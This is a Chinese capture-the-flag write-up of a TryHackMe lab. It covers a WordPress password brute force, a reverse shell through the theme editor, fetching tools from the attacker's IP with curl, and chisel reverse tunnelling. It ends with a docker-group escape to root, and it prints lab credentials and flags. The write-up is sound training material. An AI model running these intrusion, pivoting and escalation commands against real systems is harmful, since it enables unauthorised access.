打靶记录(五十)之THMForBusinessReasons

端口扫描

sudo nmap --min-rate 10000 -p- 10.10.89.151        
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 03:20 UTC
Nmap scan report for 10.10.89.151
Host is up (0.26s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
2377/tcp closed swarm
7946/tcp closed unknown

sudo nmap -sT -sV -sC -O -p80 10.10.89.151             
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 03:21 UTC
Nmap scan report for 10.10.89.151
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MilkCo Test/POC site – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), Linux 5.X (85%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:5.4 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), Linux 5.4 (85%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.22 seconds

只开放了80端口

Web

访问发现是wp站点，先扫个目录

发现一个用户是sysadmin

挂着WPscan扫一下

wpscan --url http://bus.thm/ --enumerate vp,vt,tt,u

wpscan --url http://bus.thm/wp-login.php -P /usr/share/wordlists/rockyou.txt -U sysadmin

试着爆破一下密码,得到密码:milkshake(爆的是真的慢)

登陆成功，试着传反弹shell，在apprearance里面的插件编辑，更改index.php，开启监听，访问得到shell

在/var/www/html目录找到flag0

ya7ooShiivagaipi

端口转发

奇怪的是这台机子没有其他用户

我有预感现在在docker容器中

看一下wp-config的敏感信息

define( 'DB_NAME', 'wpdb');

/** MySQL database username */
define( 'DB_USER', 'wpdbuser');

/** MySQL database password */
define( 'DB_PASSWORD', 'Ceixahz5');

/** MySQL hostname */
define( 'DB_HOST', 'db');

但是没有什么用

hostname -I能看到这台机子的内网IP

172.18.0.4

Kali开启服务器，上传一个nmap64位的静态二进制文件(uname -m可以看几位操作系统)

curl http://10.11.38.245/nmap64 -o /tmp/nmap64
chmod +x nmap64 
cd /tmp
./nmap64 -sn 172.18.0.0/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-10-07 08:49 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.18.0.1
Host is up (0.00043s latency).
Nmap scan report for 172.18.0.2
Host is up (0.00026s latency).
Nmap scan report for 172.18.0.3
Host is up (0.00020s latency).
Nmap scan report for 172.18.0.4
Host is up (0.00012s latency).

发现有四台主机是存活的

但是当我要扫描端口时发现不行，也许static binary不支持扫描端口？不知道为什么，上传了netcat也扫描不了，总之手动测试一下172.18.0.1有开22端口，需要做一个端口转发到本地ssh连接

利用chisel,

kali：

./chisel server -p 2211 --reverse          

kali作为服务器，让靶机作为客户端来连接服务器

将chisel上传到靶机

chmod +x chisel

./chisel client kaliip:2211 R:8080:172.18.0.1:22

kali连接，房间的简介提示了密码复用，于是用一开始得到的用户，发现成功登录

ssh -p 8080 sysadmin@localhost

flag1

osh4loNi

提权

id

发现我们是docker组，大概率可以用这个来提权，不过比较官方靠谱的应该是lxd组，常用于管理 LXD（Linux Containers Daemon）容器系统。

和之前一个靶机一样的做法，随便（应该是随便吧）启动一个容器（可以用docker images查看）。然后把本机根目录挂载到容器当中。然后我们是ROOT了

docker run -v /:/mnt --rm -it wordpress chroot /mnt sh

root.txt

Kainiy1Onoonoh3j

碎碎念

还算是简单的靶机吧，除了内网主机发现还有端口转发那里也许没那么容易想到，其他都是比较熟悉且简单的步骤吧。

没有记错的话，这是打的第50个靶机了吧www。也许在别人看来是枯燥乏味的，但在过程中学到了许多东西，也能打不少非常有趣的靶机，总之，感谢！今后也会继续下去的